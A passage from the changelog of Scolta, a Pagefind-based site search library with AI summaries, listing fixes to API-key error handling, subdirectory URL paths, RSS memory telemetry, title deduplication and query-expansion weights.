ApiKeyMissingExceptionis thrown byAiClientwhen no API key is set.AiEndpointHandlercatches it specifically — before the generic exception handler — and returns a graceful empty response:handleSummarizereturns{}(no summary shown),handleExpandQueryreturns the original query (no expansion), andhandleFollowUpreturns an empty response. Sites without AI configured no longer produce 503 console errors on every search. Thescolta.jsfetch catch blocks also now suppressTypeError(network unreachable / offline) silently rather than logging a warning or showing an error state, so search works normally when the AI endpoint is unreachable. (#50) - Tests added for CATEGORY and VARIETY rules in the summarize prompt template, and for
{SITE_NAME}placeholder presence in all three templates. Both CMS adapters delegate toDefaultPrompts::getTemplate()at runtime; these tests lock in the template contracts so prompt drift is caught immediately if the canonical text is removed or emptied. (#49) scolta.jsresult links no longer double the path on subdirectory installs. Result display URLs now preferdata.meta?.url(the verbatim URL stored indata-pagefind-metaby the binary indexer) over Pagefind's resolveddata.url. Pagefind's JS client resolves stored root-relative paths against the pagefind base directory when buildingdata.url, which on a subdirectory install (/drupal/web/) produces paths like/drupal/web/sites/default/files/scolta-pagefind/drupal/web/node/42. Usingdata.meta?.urlavoids this resolution entirely;resolveUrl(data.url)is kept as the fallback for the PHP indexer path wheredata.meta.urlis undefined. (scolta-drupal#40)IndexBuildOrchestrator::build()now returnserror: 'memory_abort'whenMemoryTelemetryfires. The catch block detectsRuntimeExceptionmessages containing "exceeds safe threshold" and returns a structuredStatusReportwitherror: 'memory_abort', the number of chunks already committed, and the committed page count from the build manifest. Framework adapters can now programmatically distinguish a memory abort from other failures and spawn a fresh--resumeprocess automatically.- Memory telemetry now measures actual RSS instead of PHP's allocator-reported memory.
MemoryTelemetryreads VmRSS and VmHWM from/proc/self/statuson Linux, falling back tomemory_get_usage(true)/memory_get_peak_usage(true)when/procis unavailable (macOS, Windows). Also reads cgroup v2/v1 memory limits (/sys/fs/cgroup/memory.max,/sys/fs/cgroup/memory/memory.limit_in_bytes) to determine the effective ceiling — on containerised/shared hosting the cgroup limit is often lower thanmemory_limit, and either one can SIGKILL the process. The 90% abort threshold and the heap-full guard inIndexBuildOrchestratornow use actual RSS against the effective limit.StatusReport.peakMemoryBytesnow reports the RSS high-water mark (VmHWM) rather than PHP's monotonicmemory_get_peak_usage(true). - **
IndexBuildOrchestratortail chun...
v0.3.10
Fixed
- WASM merge URL lookup now handles normalized URL formats —
merge_resultsin WASM may normalize URLs (strip.html, trailing slash, lowercase) before deduplication, causing the JS result-data lookup to miss and fall back to a stub object. The data map now indexes each result under four key variants (raw, normalized, slash-stripped, both) and falls through them in order; misses are logged as[scolta:merge] WASM URL lookup missed. - Title deduplication threshold lowered to 0.6 Jaccard — the 0.7 threshold was too permissive for short titles and multi-word proper nouns. Threshold is now 0.6, with an additional secondary condition: any pair sharing ≥3 words where the intersection covers ≥60% of the shorter title is also considered duplicate.
- AI Overview headings now render as HTML —
#,##, and###markdown headings in AI summaries were falling through to<p>tags and displaying as raw#text.formatSummary()now maps them to<h3>/<h4>/<h5>elements. - AI summary now describes post-expansion results —
summarizeResults()was firing in parallel with the expansion merge, so the AI described the Phase 1 literal-keyword ranking while the displayed results showed the semantically-reordered Phase 2 ranking. Summarization is now deferred until aftermergeExpandedSearchResults()completes. AsearchVersionstaleness check prevents summarizing results from a superseded search. - Relative URLs from pagefind index are absolutized before use —
ContentItemnormalizes stored URLs to relative paths for portability, but the JS needs absolute URLs in two places: the summarize API call (so the AI can include working links in the overview text) and result card<a>href attributes. Both now prependwindow.location.originwhen the URL starts with/. ContentItemnormalizes absolute URLs to relative paths — the pagefind index stores URLs verbatim into the binary.pf_fragmentfiles at build time. When a DDEV local URL (https://myapp.ddev.site/path) was passed asContentItem::$url, that domain was baked into the index and served as the click-through URL on the hosted demo. The constructor now strips scheme and host from any URL that contains://, leaving only the path (and optional query/fragment). Relative URLs pass through unchanged. All platform adapters benefit automatically; no code changes needed in Drupal, WordPress, or Laravel integrations. Existing indexes must be rebuilt to get correct relative URLs.stripHtml()now decodes HTML entities — the previous regex-only implementation stripped tags but left entities like’intact.escapeHtml()then double-encoded the&, causing titles and excerpts with curly quotes or other encoded characters to display as literal entity strings (e.g.Houston, We’ve Had a Problem).stripHtml()now uses DOM parsing (innerHTML/textContent) to both strip tags and decode entities in one pass.
Added
ContentItem::$filtersandPagefindHtmlBuilderextra-filter support — a new optionalfilters: array<string, string>parameter onContentItemlets platform adapters attach arbitrary Pagefind filter attributes (e.g.['base_topic' => 'Cardiology']) that bypassHtmlCleanerand are emitted directly as<span data-pagefind-filter="key:value" hidden>elements in the exported HTML.InvertedIndexBuildermerges these into the page'sfiltersmap so the PHP indexer path also exposes them. Use case: topic-family deduplication, faceted navigation, or any per-document filter that should not be derived from body text.
Changed
content_catalogpreset gainsexpand_primary_weight: 0.9— validation testing showed that intent-based queries ("something about space") return zero raw pagefind results because stop words dominate the query. The AI expands to useful terms ("astronomy, celestial bodies") but at the old weight (default 0.5) those expanded results were diluted by the empty primary set. 0.9 gives AI-expanded results nearly equal weight to primary results, recovering the intent-based query path. Raised from implicit default (0.5) to 0.9.ecommercepresetexpand_primary_weightraised to 0.8 — validation testing showed that natural-language product queries ("sparkly blue gift") succeed with AI expansion but the 0.7 weight left expanded results slightly under-weighted. 0.8 brings better balance for informal shopping queries without sacrificing precision for specific product name queries. Raised from 0.7 to 0.8.